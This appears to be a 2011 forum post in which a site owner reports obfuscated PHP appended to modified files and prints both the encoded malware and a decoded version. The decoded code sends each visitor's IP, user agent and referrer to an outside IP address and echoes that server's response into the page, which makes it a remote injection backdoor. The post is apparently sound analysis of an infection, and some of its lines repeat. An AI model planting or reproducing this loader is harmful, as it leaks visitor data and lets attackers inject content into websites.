2011-10-13, 05:15 PM
I had some added code at the very end of my modified files:
Decoded (after parsing through evals and retardedly simple "encryption"):
No insecure templates reported. I tried visiting the url manually with bogus values (like ip=nope.sorry and ua=manual) but nothing happened, just a connection timeout.
// All on one line, formatted for the post including line breaks and one space
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';
eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTI zNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));
$ip = $_SERVER['REMOTE_ADDR'];
$host = $_SERVER['HTTP_HOST'];
$uri = urlencode($_SERVER['REQUEST_URI']);
$ref = urlencode($_SERVER['HTTP_REFERER']);
$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref;
$tmp = file_get_contents($url);
echo $tmp;
?>
Decoded (after parsing through evals and retardedly simple "encryption"):
$_F=__FILE__;
$url = 'http://96.196.216.30/bt.php';
$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));
$ip = $_SERVER['REMOTE_ADDR'];
$host = $_SERVER['HTTP_HOST'];
$uri = urlencode($_SERVER['REQUEST_URI']);
$ref = urlencode($_SERVER['HTTP_REFERER']);
$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref;
$tmp = file_get_contents($url);
echo $tmp;
Actually, I might be missing something in the URL assignment...No insecure templates reported. I tried visiting the url manually with bogus values (like ip=nope.sorry and ua=manual) but nothing happened, just a connection timeout.